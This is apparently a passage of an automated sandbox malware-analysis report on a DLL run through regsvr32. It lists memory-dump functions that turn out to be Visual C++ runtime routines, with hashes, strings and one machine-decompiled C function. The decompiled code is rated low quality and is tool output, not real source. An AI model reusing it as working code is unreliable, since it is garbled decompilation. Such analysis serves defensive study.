                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_error$_invalid_parameter
                                                      • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                                      • API String ID: 2356156361-2279852085
                                                      • Opcode ID: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                      • Instruction ID: 4b7917f2e6131773ed7248c088fbaee50c31bf3d43f4cd1ee6c8c65be3a18826
                                                      • Opcode Fuzzy Hash: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                      • Instruction Fuzzy Hash: BCC1E77190DBC681EBB48B15E8803EEA3E1F389384F614126E6CD42BB9DB7ED155CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2CB4F Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 174fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: FileHandleWrite
                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                                      • API String ID: 3320372497-2837547082
                                                      • Opcode ID: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                      • Instruction ID: 0a9042e1a7d7c8a566278db251693fc707392c06de90b0eab8804e289765c981
                                                      • Opcode Fuzzy Hash: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                      • Instruction Fuzzy Hash: 4C910E31A1CA8685EBA0DB64E8543BE63E0F384784FA04126D6CD47AB9DF3FE545CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D312E3 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 102libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                      • API String ID: 2574300362-564504941
                                                      • Opcode ID: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                      • Instruction ID: 70a6d76ff3d3819b8955004bde04ce45998dc5e92ad36a3a08ed7dd3d00f33af
                                                      • Opcode Fuzzy Hash: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                      • Instruction Fuzzy Hash: F051A635A08A8286E7A09B19FC5476E73E4F784B51F609035DACE43A74DF7EE488CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D376C0 Relevance: 33.3, APIs: 22, Instructions: 322COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                                      • String ID:
                                                      • API String ID: 641786319-0
                                                      • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                      • Instruction ID: 27f88887327b6a70fd6681a1572ed994cc0fbf2c3fc8410d15a0bdfd36c78ba8
                                                      • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                      • Instruction Fuzzy Hash: 7402F432A0CEC5C1D6A09B15E8903AEB7A0F7857A5F604226E6DD47BE9DF3ED445CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D340B0 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 341COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 20%
                                                      			E000007FE7FEF9D340B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
				long long _v24;
				long long _v32;
				char _v56;
				long long _v64;
				long long _v72;
				char _v80;
				void* _v88;
				void* _v96;
				intOrPtr _v104;
				void* _v112;
				intOrPtr _v120;
				void* _v128;
				char _v132;
				char _v136;
				long long _v144;
				signed int _v152;
				char _v160;
				signed char _v164;
				signed int _v168;
				char _v176;
				char _v184;
				long long _v192;
				signed char _v200;
				long long _v208;
				signed int _v216;
				signed int _v224;
				long long _v232;
				void* _t222;
				void* _t244;
				void* _t295;
				long long _t302;
				long long _t303;
				intOrPtr _t311;
				long long _t312;
				long long _t321;
				intOrPtr _t325;
				long long _t329;
				long long _t330;
				long long _t332;

				_t295 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v164 = 0;
				_v152 = 0;
				_v168 = E000007FE7FEF9D33B40(_a40, _a32);
				E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v160);
				if (_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40) <= 0) goto 0xf9d34176;
				r9d = _v168;
				E000007FE7FEF9D33BD0(_t217,  &_v160, _a32, _a40);
				r9d = _v168;
				E000007FE7FEF9D33C00(_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
				goto 0xf9d34197;
				_v168 = E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40);
				if (_v168 - 0xffffffff < 0) goto 0xf9d341b1;
				if (_v168 - _a40[1] >= 0) goto 0xf9d341b1;
				goto 0xf9d341b6;
				_t222 = E000007FE7FEF9D2CF80(_a40);
				if ( *_a8 != 0xe06d7363) goto 0xf9d34398;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d34398;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d34213;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d34213;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d34398;
				_t302 = _a8;
				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0xf9d34398;
				0xf9d24000();
				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0xf9d3423a;
				goto 0xf9d34862;
				0xf9d24000();
				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
				_a8 = _t303;
				0xf9d24000();
				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
				_v164 = 1;
				E000007FE7FEF9D2E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
				if (E000007FE7FEF9D3D2C0(1, _a8) == 0) goto 0xf9d34290;
				goto 0xf9d34295;
				E000007FE7FEF9D2CF80(_a8);
				if ( *_a8 != 0xe06d7363) goto 0xf9d342fa;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d342fa;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d342e6;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d342e6;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d342fa;
				_t311 = _a8;
				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0xf9d342fa;
				E000007FE7FEF9D2CF80(_t311);
				0xf9d24000();
				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0xf9d34398;
				0xf9d24000();
				_t312 =  *((intOrPtr*)(_t311 + 0x108));
				_v144 = _t312;
				0xf9d24000();
				 *((long long*)(_t312 + 0x108)) = 0;
				if ((E000007FE7FEF9D35BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0xf9d34349;
				goto 0xf9d34398;
				if ((E000007FE7FEF9D35CC0(_v144) & 0x000000ff) == 0) goto 0xf9d34393;
				E000007FE7FEF9D35AB0(1, _a8);
				E000007FE7FEF9D34870( &_v56, "bad exception");
				E000007FE7FEF9D3D320(__edi, __esi, __esp,  &_v56, 0xf9d4a180);
				goto 0xf9d34398;
				E000007FE7FEF9D2CF50(_t312);
				if ( *_a8 != 0xe06d7363) goto 0xf9d347d9;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d347d9;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d343f5;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d343f5;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d347d9;
				if (_a40[3] <= 0) goto 0xf9d3466c;
				_v216 = _a32;
				_v224 =  &_v132;
				_t321 =  &_v136;
				_v232 = _t321;
				r9d = _v168;
				r8d = _a56;
				E000007FE7FEF9D2EA30(_a16, _a40);
				_v128 = _t321;
				goto 0xf9d3447e;
				_v136 = _v136 + 1;
				_v128 = _v128 + 0x14;
				if (_v136 - _v132 >= 0) goto 0xf9d3466c;
				if ( *_v128 - _v168 > 0) goto 0xf9d344b3;
				_t325 = _v128;
				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0xf9d344b5;
				goto 0xf9d3445a;
				E000007FE7FEF9D2E680( *((intOrPtr*)(_t325 + 4)), _t325);
				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
				_v120 =  *((intOrPtr*)(_v128 + 0xc));
				_v120 = _v120 - 1;
				_t329 = _v112 + 0x14;
				_v112 = _t329;
				if (_v120 <= 0) goto 0xf9d34667;
				_t244 = E000007FE7FEF9D2E6A0(_v120 - 1, _t329);
				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
				_v96 = _t330;
				E000007FE7FEF9D2E6A0(_t244, _t330);
				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
				goto 0xf9d3457e;
				_v104 = _v104 - 1;
				_t332 = _v96 + 4;
				_v96 = _t332;
				if (_v104 <= 0) goto 0xf9d34662;
				E000007FE7FEF9D2E6A0(_v104 - 1, _t332);
				_v88 = _t332 +  *_v96;
				if (E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0xf9d345ce;
				goto 0xf9d3455a;
				_v152 = 1;
				_v176 = _a48 & 0x000000ff;
				_v184 = _v164 & 0x000000ff;
				_v192 = _a64;
				_v200 = _a56;
				_v208 = _v128;
				_v216 = _v88;
				_v224 = _v112;
				_v232 = _a40;
				E000007FE7FEF9D35180(__edi, __esi, __esp, E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
				goto 0xf9d34667;
				goto 0xf9d3455a;
				goto L1;
				goto 0xf9d3445a;
				__eax = _v152 & 0x000000ff;
				__eflags = _v152 & 0x000000ff;
				if ((_v152 & 0x000000ff) != 0) goto 0xf9d347d7;
				__rax = _a40;
				__eax =  *_a40;
				__eax =  *_a40 & 0x1fffffff;
				__eflags = __eax - 0x19930521;
				if (__eax - 0x19930521 < 0) goto 0xf9d347d7;
				__rax = _a40;
				__eflags =  *(__rax + 0x20);
				if ( *(__rax + 0x20) == 0) goto 0xf9d346bf;
				__eax = E000007FE7FEF9D2E680(__eax, __rax);
				_a40 = _a40[8];
				_v32 = __rax;
				goto 0xf9d346cb;
				_v32 = 0;
				__eflags = _v32;
				if (_v32 == 0) goto 0xf9d347d7;
				__rax = _a40;
				__eflags =  *(__rax + 0x20);
				if ( *(__rax + 0x20) == 0) goto 0xf9d34706;
				__eax = E000007FE7FEF9D2E680(__eax, __rax);
				_a40 = _a40[8];
				__rax = __rax + _a40[8];
				_v24 = __rax;
				goto 0xf9d34712;
				_v24 = 0;
				__rdx = _v24;
				__rcx = _a8;
				E000007FE7FEF9D35BB0(__rax, _a8, _v24) = __al & 0x000000ff;
				__eflags = __al & 0x000000ff;
				if ((__al & 0x000000ff) != 0) goto 0xf9d347d7;
				__rax = _a16;
				_v64 = _a16;
				__r9 =  &_v80;
				__r8 = _a40;
				__rdx = _a32;
				__rcx = _a16;
				__eax = E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v80);
				_v64 = __rax;
				_v72 = 0;
				__eax = _a48 & 0x000000ff;
				_v200 = __al;
				__rax = _a32;
				_v208 = _a32;
				__rax = _a40;
				_v216 = _a40;
				_v224 = 0xffffffff;
				_v232 = 0;
				__r9 = _v64;
				__r8 = _a24;
				__rdx = _a8;
				__rcx = _a16;
				__eax = E000007FE7FEF9D2EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
				goto 0xf9d3484c;
				__rax = _a40;
				__eflags =  *(__rax + 0xc);
				if ( *(__rax + 0xc) <= 0) goto 0xf9d3484c;
				__eax = _a48 & 0x000000ff;
				__eflags = _a48 & 0x000000ff;
				if ((_a48 & 0x000000ff) != 0) goto 0xf9d34847;
				__rax = _a64;
				_v208 = _a64;
				__eax = _a56;
				_v216 = _a56;
				__eax = _v168;
				_v224 = _v168;
				__rax = _a40;
				_v232 = _a40;
				__r9 = _a32;
				__r8 = _a24;
				__rdx = _a16;
				__rcx = _a8;
				__eax = E000007FE7FEF9D34960(__ecx, _a8, _a16, _a24, _a32);
				goto 0xf9d3484c;
				__eax = E000007FE7FEF9D2CF50(__rax);
				0xf9d24000();
				__eflags =  *((long long*)(__rax + 0x108));
				if ( *((long long*)(__rax + 0x108)) != 0) goto 0xf9d3485d;
				goto 0xf9d34862;
				return E000007FE7FEF9D2CF80(__rax);
			}










































                                                      0x7fef9d340b0
                                                      0x7fef9d340b0
                                                      0x7fef9d340b5
                                                      0x7fef9d340ba
                                                      0x7fef9d340bf
                                                      0x7fef9d340cb
                                                      0x7fef9d340d0
                                                      0x7fef9d340ea
                                                      0x7fef9d3410b
                                                      0x7fef9d34131
                                                      0x7fef9d34133
                                                      0x7fef9d3414d
                                                      0x7fef9d34152
                                                      0x7fef9d3416f
                                                      0x7fef9d34174
                                                      0x7fef9d34193
                                                      0x7fef9d3419c
                                                      0x7fef9d341ad
                                                      0x7fef9d341af
                                                      0x7fef9d341b1
                                                      0x7fef9d341c4
                                                      0x7fef9d341d6
                                                      0x7fef9d341eb
                                                      0x7fef9d341fc
                                                      0x7fef9d3420d
                                                      0x7fef9d34213
                                                      0x7fef9d34220
                                                      0x7fef9d34226
                                                      0x7fef9d34233
                                                      0x7fef9d34235
                                                      0x7fef9d3423a
                                                      0x7fef9d3423f
                                                      0x7fef9d34246
                                                      0x7fef9d3424e
                                                      0x7fef9d3425a
                                                      0x7fef9d34262
                                                      0x7fef9d34273
                                                      0x7fef9d3428c
                                                      0x7fef9d3428e
                                                      0x7fef9d34290
                                                      0x7fef9d342a3
                                                      0x7fef9d342b1
                                                      0x7fef9d342c2
                                                      0x7fef9d342d3
                                                      0x7fef9d342e4
                                                      0x7fef9d342e6
                                                      0x7fef9d342f3
                                                      0x7fef9d342f5
                                                      0x7fef9d342fa
                                                      0x7fef9d34307
                                                      0x7fef9d3430d
                                                      0x7fef9d34312
                                                      0x7fef9d34319
                                                      0x7fef9d3431e
                                                      0x7fef9d34323
                                                      0x7fef9d34345
                                                      0x7fef9d34347
                                                      0x7fef9d34358
                                                      0x7fef9d34364
                                                      0x7fef9d34378
                                                      0x7fef9d3438c
                                                      0x7fef9d34391
                                                      0x7fef9d34393
                                                      0x7fef9d343a6
                                                      0x7fef9d343b8
                                                      0x7fef9d343cd
                                                      0x7fef9d343de
                                                      0x7fef9d343ef
                                                      0x7fef9d34401
                                                      0x7fef9d3440f
                                                      0x7fef9d3441c
                                                      0x7fef9d34421
                                                      0x7fef9d34429
                                                      0x7fef9d3442e
                                                      0x7fef9d34433
                                                      0x7fef9d3444b
                                                      0x7fef9d34450
                                                      0x7fef9d34458
                                                      0x7fef9d34463
                                                      0x7fef9d34476
                                                      0x7fef9d3448c
                                                      0x7fef9d344a0
                                                      0x7fef9d344a2
                                                      0x7fef9d344b1
                                                      0x7fef9d344b3
                                                      0x7fef9d344b5
                                                      0x7fef9d344c9
                                                      0x7fef9d344dc
                                                      0x7fef9d344ee
                                                      0x7fef9d344fd
                                                      0x7fef9d34501
                                                      0x7fef9d34511
                                                      0x7fef9d34517
                                                      0x7fef9d3452c
                                                      0x7fef9d34531
                                                      0x7fef9d34539
                                                      0x7fef9d34551
                                                      0x7fef9d34558
                                                      0x7fef9d34563
                                                      0x7fef9d34572
                                                      0x7fef9d34576
                                                      0x7fef9d34586
                                                      0x7fef9d3458c
                                                      0x7fef9d3459f
                                                      0x7fef9d345ca
                                                      0x7fef9d345cc
                                                      0x7fef9d345ce
                                                      0x7fef9d345db
                                                      0x7fef9d345e4
                                                      0x7fef9d345f0
                                                      0x7fef9d345fc
                                                      0x7fef9d34608
                                                      0x7fef9d34615
                                                      0x7fef9d34622
                                                      0x7fef9d3462f
                                                      0x7fef9d34654
                                                      0x7fef9d3465b
                                                      0x7fef9d3465d
                                                      0x7fef9d34662
                                                      0x7fef9d34667
                                                      0x7fef9d3466c
                                                      0x7fef9d34671
                                                      0x7fef9d34673
                                                      0x7fef9d34679
                                                      0x7fef9d34681
                                                      0x7fef9d34683
                                                      0x7fef9d34688
                                                      0x7fef9d3468d
                                                      0x7fef9d34693
                                                      0x7fef9d3469b
                                                      0x7fef9d3469f
                                                      0x7fef9d346a1
                                                      0x7fef9d346ae
                                                      0x7fef9d346b5
                                                      0x7fef9d346bd
                                                      0x7fef9d346bf
                                                      0x7fef9d346cb
                                                      0x7fef9d346d4
                                                      0x7fef9d346da
                                                      0x7fef9d346e2
                                                      0x7fef9d346e6
                                                      0x7fef9d346e8
                                                      0x7fef9d346f5
                                                      0x7fef9d346f9
                                                      0x7fef9d346fc
                                                      0x7fef9d34704
                                                      0x7fef9d34706
                                                      0x7fef9d34712
                                                      0x7fef9d3471a
                                                      0x7fef9d34727
                                                      0x7fef9d3472a
                                                      0x7fef9d3472c
                                                      0x7fef9d34732
                                                      0x7fef9d3473a
                                                      0x7fef9d34742
                                                      0x7fef9d3474a
                                                      0x7fef9d34752
                                                      0x7fef9d3475a
                                                      0x7fef9d34762
                                                      0x7fef9d34767
                                                      0x7fef9d3476f
                                                      0x7fef9d3477b
                                                      0x7fef9d34783
                                                      0x7fef9d34787
                                                      0x7fef9d3478f
                                                      0x7fef9d34794
                                                      0x7fef9d3479c
                                                      0x7fef9d347a1
                                                      0x7fef9d347a9
                                                      0x7fef9d347b2
                                                      0x7fef9d347ba
                                                      0x7fef9d347c2
                                                      0x7fef9d347ca
                                                      0x7fef9d347d2
                                                      0x7fef9d347d7
                                                      0x7fef9d347d9
                                                      0x7fef9d347e1
                                                      0x7fef9d347e5
                                                      0x7fef9d347e7
                                                      0x7fef9d347ef
                                                      0x7fef9d347f1
                                                      0x7fef9d347f3
                                                      0x7fef9d347fb
                                                      0x7fef9d34800
                                                      0x7fef9d34807
                                                      0x7fef9d3480b
                                                      0x7fef9d3480f
                                                      0x7fef9d34813
                                                      0x7fef9d3481b
                                                      0x7fef9d34820
                                                      0x7fef9d34828
                                                      0x7fef9d34830
                                                      0x7fef9d34838
                                                      0x7fef9d34840
                                                      0x7fef9d34845
                                                      0x7fef9d34847
                                                      0x7fef9d3484c
                                                      0x7fef9d34851
                                                      0x7fef9d34859
                                                      0x7fef9d3485b
                                                      0x7fef9d34869

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                                      • String ID: bad exception$csm$csm$csm
                                                      • API String ID: 3498492519-820278400
                                                      • Opcode ID: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                      • Instruction ID: b93d13205fcb5bf4744c4f5868d42f2397ba004b3dd065f5f3bbc86f0087c528
                                                      • Opcode Fuzzy Hash: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                      • Instruction Fuzzy Hash: C412D436A0DBC585DAB19B15E8407EEB7A0F7C8791F604126DACD87BA9CB7DD440CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3B580 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 318COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                                      • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 4023976971-2293733425
                                                      • Opcode ID: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                      • Instruction ID: fa666a0989dbdcd631dba14fdf712f3fd1171dc1b338b0fed7bc0ada6eb2a45d
                                                      • Opcode Fuzzy Hash: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                      • Instruction Fuzzy Hash: 8B024A72A0D7C28AE7B09B24E8447BEB7E4F384345F604126D6CC46AA9DB7EE545CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D35EA0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 256COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                                      • API String ID: 530996419-3695252689
                                                      • Opcode ID: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                      • Instruction ID: dd73616ddae2cae72d7b30165dff30affe8ff5e8ed842a8499c58fb9266416ee
                                                      • Opcode Fuzzy Hash: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                      • Instruction Fuzzy Hash: FAD11832A1CBC585E7A09B15E8407AEB7A0F784794F605626E6DE83BE9DF3DD444CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3B090 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 219COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
